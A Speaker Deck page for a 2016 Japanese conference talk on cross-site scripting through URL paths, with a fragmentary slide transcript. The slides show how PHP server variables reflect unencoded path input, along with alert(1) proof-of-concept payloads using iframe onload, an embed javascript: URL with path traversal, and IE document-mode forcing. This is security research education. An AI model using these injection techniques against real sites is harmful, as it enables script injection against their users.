Upgrade to Pro — share decks privately, control downloads, hide ads and more …

明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7

1a5bce24526a7d6f1ab89678df2d673c?s=47 Masato Kinugawa
March 29, 2016
Technology
14
22k

明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7

Shibuya.XSS techtalk #7 の資料です。

1a5bce24526a7d6f1ab89678df2d673c?s=128

Masato Kinugawa

March 29, 2016
Tweet

More Decks by Masato Kinugawa

See All by Masato Kinugawa
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
21
5k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
5
71k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
9
12k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
17
10k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
35
18k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
2
1.4k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
20
21k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
4
2.2k
1a5bce24526a7d6f1ab89678df2d673c?s=48 masatokinugawa
7
2.2k

Other Decks in Technology

See All in Technology
65f840d22d4507284fc10332fdde00fe?s=48 lulak21
0
150
F507086e15832a4344df6b10cdc5b179?s=48 localyouser
0
260
93aef1d166a8a3536538eff713f80307?s=48 flant
0
5.8k
00851927294532e0742c2c174730dff0?s=48 ido_kara_deru
2
250
7e6a435700dda6cdb22105d601f20892?s=48 picardparis
4
2.7k
140494d272a4d89883a94fdfdb29dea2?s=48 oracle4engineer
PRO
0
110
8e308462954f8c38cc60dabb8b7bc6a3?s=48 widstkyi
0
270
B779d735abea86f44b30ffae5a7a7c90?s=48 ugogon
0
110
8e308462954f8c38cc60dabb8b7bc6a3?s=48 widstkyi
0
360
462feb0fe0493c40d55650da664e8773?s=48 clustervr
PRO
0
170
7e20183342a040a32924a41343603286?s=48 konabuta
0
1.1k
C825832c4fc71ffdfd44905729281fb0?s=48 puhitaku
0
250

Featured

See All Featured
5f2da528927a2ec9ba4fec2069cbc958?s=48 kneath
220
15k
8081b26e05bb4354f7d65ffc34cbbd67?s=48 chriscoyier
146
20k
D36d2c1821af9249b69ff7f5ed60529b?s=48 tammielis
238
23k
64827b31aef81498662e8af4bd6d5157?s=48 jonrohan
1020
390k
5f50f94346fbcb23706f0707169317a4?s=48 aarron
258
36k
1177e050db6bafe62885362edf6e3537?s=48 lauravandoore
12
1.9k
1b75d89772b7eea1f6c89fbf362607d9?s=48 moore
125
21k
3d4519fd34b76fb265fc0237f3792bd4?s=48 danielanewman
204
20k
E4f5d494ebdc9e7cce1aecf3ce3e8bc1?s=48 shpigford
371
43k
9128d500301ae51524e887bb680f471d?s=48 caitiem20
312
18k
C0390e8b11079f8761c0cd3274ed61cb?s=48 productmarketing
8
970
F383c6a4dc55e331bbe2987b622cee6b?s=48 stephaniewalter
262
11k

Transcript

  1. None
  2. None
  3. None
  4. None
  5. None

  6. https://host/tags/aaa/ ... </head> <body> <form> <input type="text" value="aaa"> ...

  7. ... </head> <meta property="og:url" content="https://host/path/index"> <body> ... https://host/path/index?p=1

  8. ... </head> <meta property="og:url" content="https://host/path/index;aaa"> <body> ... https://host/path/index;aaa?p=1

  9. None

  10. http://php.net/index.php http://php.net/index.php/xxx/yyy/zzz

  11. http://shibuyaxss.connpass.com/event/28232/ http://shibuyaxss.connpass.com/event/28232/;abc

  12. None

  13. SCRIPT_URL /test.php/<b>PATH</b> SCRIPT_URI http://localhost/test.php/<b>PATH</b> PATH_INFO /<b>PATH</b> PATH_TRANSLATED \<b>PATH<\b> PHP_SELF /test.php/<b>PATH</b>

  14. GET /path?query HTTP/1.1 http://php.net/manual/ja/reserved.variables.server.php

  15. /test.php/<b>PATH</b>?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY% 3C/b%3E HTTP/1.1 QUERY_STRING %3Cb%3EQUERY%3C/b%3E REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E? %3Cb%3EQUERY%3C/b%3E

    http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>

  16. /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> HTTP/1.1 QUERY_STRING <b>QUERY</b> REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>

  17. http://localhost/test.php/<b>PATH</b> GET /test.php/<b>PATH</b> HTTP/1.1

  18. /test.php/%3Cb%3EPATH%3C/b%3E GET /test.php/<b>PATH</b> HTTP/1.1 REQUEST_URI /test.php/<b>PATH</b> location.pathname /test.php/%3Cb%3EPATH%3C/b%3E http://localhost/test.php/<b>PATH</b>

  19. None
  20. None
  21. None
  22. None
  23. None
  24. None
  25. None
  26. None
  27. None
  28. None
  29. None
  30. None
  31. None
  32. None
  33. None

  34. HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=9 <head> <meta

    http-equiv="X-UA-Compatible" content="IE=9"> </head>

  35. <svg> <circle cx="100" cy="100" r="50" fill="red"/> </svg>

  36. ifr=document.createElement('<iframe onload=alert(1)>'); document.body.appendChild(ifr); InvalidCharacterError

  37. <meta http-equiv="X-UA-Compatible" content="IE=9"> <script> console.log(document.documentMode) /* 9 */ </script> <iframe

    src=//victim/></iframe> http://blogs.msdn.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components- weblogfiles/00-00-01-35-07/3073.IE_5F00_chart_5F00_jp.pdf

  38. <meta http-equiv="X-UA-Compatible" content="IE=9"> <embed src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/% 2F..%2F..%2Fjizen2#hash"></embed>

  39. <script src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js"> </script>

  40. None
  41. None
  42. None
  43. None
  44. None
  45. None
  46. None
  47. None
  48. None
  49. None
  50. None
  51. None
  52. None